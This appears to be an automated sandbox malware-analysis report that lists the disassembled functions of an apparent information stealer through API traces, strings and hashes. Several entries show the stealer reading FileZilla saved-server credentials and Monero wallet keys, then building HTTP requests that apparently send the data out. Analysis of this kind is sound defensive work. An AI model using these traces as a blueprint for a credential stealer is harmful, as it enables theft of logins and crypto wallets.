                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: _^tw
                          • API String ID: 0-1362795327
                          • Opcode ID: 9199ae279f3c2d7556793103b7506e61c6b739f95523c3d74b7ab5561202caa4
                          • Instruction ID: ae7d3eb2b7159f1853003ff2c76b47758f034b7303073d77c315f437f16e6363
                          • Opcode Fuzzy Hash: 9199ae279f3c2d7556793103b7506e61c6b739f95523c3d74b7ab5561202caa4
                          • Instruction Fuzzy Hash: 0B51F7B3A093149FE304AE39DC84366B7D5EF58720F1A893DDAC8D3384EA7958048787
                          Function 00735656 Relevance: .2, Instructions: 156COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 721b9385ac456aca4eb0aa95a34a89fc0779ef8f50c3874e01d404cb022d7c6e
                          • Instruction ID: 461dcea5d173e1b6865f5e48c595a05887298fda5eff11ace0a16d3615fe572b
                          • Opcode Fuzzy Hash: 721b9385ac456aca4eb0aa95a34a89fc0779ef8f50c3874e01d404cb022d7c6e
                          • Instruction Fuzzy Hash: 964126F7A446084BF314AD7ADC44376B796EBD0360F2B863CDA95C77C4EC7998064282
                          Function 0084C8B3 Relevance: .1, Instructions: 146COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 493fdf35e9fe501779385be32e29f1ce498db1b5645148ab770fb7aa060cfbaa
                          • Instruction ID: 461c106cb405166df277f244df3d83334c9f9a42c5abab5f9f39bfc31c3c7476
                          • Opcode Fuzzy Hash: 493fdf35e9fe501779385be32e29f1ce498db1b5645148ab770fb7aa060cfbaa
                          • Instruction Fuzzy Hash: 0D41B6B261C600AFE701BF2CDC8567AB7E5EF98724F054A2DEAC4C3300E67598518B93
                          Function 006EA0AA Relevance: .1, Instructions: 143COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 30a4506a59b1153d452a52420fa550c89c37cb5c2adc1e4d8a229149f2fdfab4
                          • Instruction ID: c76a01f3e413bfc04610af01f58d9ad41eff4b90e981a9468d3566c836929432
                          • Opcode Fuzzy Hash: 30a4506a59b1153d452a52420fa550c89c37cb5c2adc1e4d8a229149f2fdfab4
                          • Instruction Fuzzy Hash: 5C41E4B2A085008FE344AE2DDC8577AF7E6EFD8320F1A863DE6D5C3784E93458058682
                          Function 00734493 Relevance: .1, Instructions: 138COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 84d8a0f648f3ee3273950620d616ee5e6b7d19eab0b8feaf706574830ceedd84
                          • Instruction ID: bd4838141714ac05eb1fe54571b24460b507210e34c505db6e02a9d6cf668a82
                          • Opcode Fuzzy Hash: 84d8a0f648f3ee3273950620d616ee5e6b7d19eab0b8feaf706574830ceedd84
                          • Instruction Fuzzy Hash: 57415CF3A085049BE304AE2DEC9277BF7D6EFD8310F1A863DD699C3784E93558048686
                          Function 00419750 Relevance: .0, Instructions: 15COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                          • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                          Function 00410250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00418E0B
                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                            • Part of subcall function 0041A920: lstrcat.KERNEL32(00000000), ref: 0041A982
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                            • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                            • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                            • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                            • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,0040148F,00000000), ref: 00409A5A
                            • Part of subcall function 004099C0: LocalFree.KERNEL32(0040148F), ref: 00409A90
                            • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                            • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                          • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00410369
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410393
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 004103DD
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410427
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410475
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041051A
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410532
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041054A
                          • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00410562
                          • lstrcat.KERNEL32(?,profile: null), ref: 00410571
                          • lstrcat.KERNEL32(?,url: ), ref: 00410580
                          • lstrcat.KERNEL32(?,00000000), ref: 00410593
                          • lstrcat.KERNEL32(?,00421678), ref: 004105A2
                          • lstrcat.KERNEL32(?,00000000), ref: 004105B5
                          • lstrcat.KERNEL32(?,0042167C), ref: 004105C4
                          • lstrcat.KERNEL32(?,login: ), ref: 004105D3
                          • lstrcat.KERNEL32(?,00000000), ref: 004105E6
                          • lstrcat.KERNEL32(?,00421688), ref: 004105F5
                          • lstrcat.KERNEL32(?,password: ), ref: 00410604
                          • lstrcat.KERNEL32(?,00000000), ref: 00410617
                          • lstrcat.KERNEL32(?,00421698), ref: 00410626
                          • lstrcat.KERNEL32(?,0042169C), ref: 00410635
                          • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 1942843190-555421843
                          • Opcode ID: b83ff178b7d5869ad14250963add7427843a330348d9764d8bb8964bcaa99a90
                          • Instruction ID: 638dbb6ae615345b7932def7a19798fabdeecf0a7b17130adc4e1f0da6208cd7
                          • Opcode Fuzzy Hash: b83ff178b7d5869ad14250963add7427843a330348d9764d8bb8964bcaa99a90
                          • Instruction Fuzzy Hash: 23D17E75A41208ABCB04FBF0DD96EEE7379EF14314F50441EF102A6091DF78AA96CB69
                          Function 00405960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                            • Part of subcall function 004047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                            • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
                          • StrCmpCA.SHLWAPI(?,0128E5E0), ref: 00405A13
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
                          • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0128E550,00000000,?,01289998,00000000,?,00421A1C), ref: 00405E71
                          • lstrlen.KERNEL32(00000000), ref: 00405E82
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00405E9A
                          • lstrlen.KERNEL32(00000000), ref: 00405EAF
                          • lstrlen.KERNEL32(00000000), ref: 00405ED8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
                          • lstrlen.KERNEL32(00000000,?,?), ref: 00405F1B
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
                          • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
                          • InternetCloseHandle.WININET(00000000), ref: 00405FB0
                          • InternetCloseHandle.WININET(00000000), ref: 00405FBD
                          • HttpOpenRequestA.WININET(00000000,0128E5C0,?,0128DBB0,00000000,00000000,00400100,00000000), ref: 00405BF8
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                            • Part of subcall function 0041A920: lstrcat.KERNEL32(00000000), ref: 0041A982
                          • InternetCloseHandle.WININET(00000000), ref: 00405FC7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 874700897-2180234286
                          • Opcode ID: ac4f865af4aa3e0c16e5010cfb2a8e0f1ad85d16cc29c10ae0f08586dfb824bd
                          • Instruction ID: 0e5facfd5055de801f7f1688313f8c34c81b7350285768c2e278bb72b88d17e9
                          • Opcode Fuzzy Hash: ac4f865af4aa3e0c16e5010cfb2a8e0f1ad85d16cc29c10ae0f08586dfb824bd
                          • Instruction Fuzzy Hash: 9F125171821118ABCB15FBA1DC95FEE7378BF14714F50015EB10A62091DF782B9ACF69
                          Function 0040CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                            • Part of subcall function 00418B60: GetSystemTime.KERNEL32(00420E1A,012899C8,004205AE,?,?,004013F9,?,0000001A,00420E1A,00000000,?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 00418B86
                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                            • Part of subcall function 0041A920: lstrcat.KERNEL32(00000000), ref: 0041A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF83
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0040D0CE
                          • lstrcat.KERNEL32(?,00000000), ref: 0040D208
                          • lstrcat.KERNEL32(?,00421478), ref: 0040D217
                          • lstrcat.KERNEL32(?,00000000), ref: 0040D22A
                          • lstrcat.KERNEL32(?,0042147C), ref: 0040D239
                          • lstrcat.KERNEL32(?,00000000), ref: 0040D24C
                          • lstrcat.KERNEL32(?,00421480), ref: 0040D25B
                          • lstrcat.KERNEL32(?,00000000), ref: 0040D26E
                          • lstrcat.KERNEL32(?,00421484), ref: 0040D27D
                          • lstrcat.KERNEL32(?,00000000), ref: 0040D290
                          • lstrcat.KERNEL32(?,00421488), ref: 0040D29F
                          • lstrcat.KERNEL32(?,00000000), ref: 0040D2B2
                          • lstrcat.KERNEL32(?,0042148C), ref: 0040D2C1
                          • lstrcat.KERNEL32(?,00000000), ref: 0040D2D4
                          • lstrcat.KERNEL32(?,00421490), ref: 0040D2E3
                            • Part of subcall function 0041A820: lstrlen.KERNEL32(00404F05,?,?,00404F05,00420DDE), ref: 0041A82B
                            • Part of subcall function 0041A820: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0041A885
                          • lstrlen.KERNEL32(?), ref: 0040D32A
                          • lstrlen.KERNEL32(?), ref: 0040D339
                            • Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(012888C0,0040A7A7,?,0040A7A7,012888C0), ref: 0041AA8F
                          • DeleteFileA.KERNEL32(00000000), ref: 0040D3B4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                          • String ID:
                          • API String ID: 1956182324-0
                          • Opcode ID: b5b6774b38bbe5c613bd724fcd1069255e6ae182392d22547e929488bfccd0a6
                          • Instruction ID: 2c4570a162c9209662db32344ca83047e0d2bb731ca2817032ce09d5ba58344d
                          • Opcode Fuzzy Hash: b5b6774b38bbe5c613bd724fcd1069255e6ae182392d22547e929488bfccd0a6
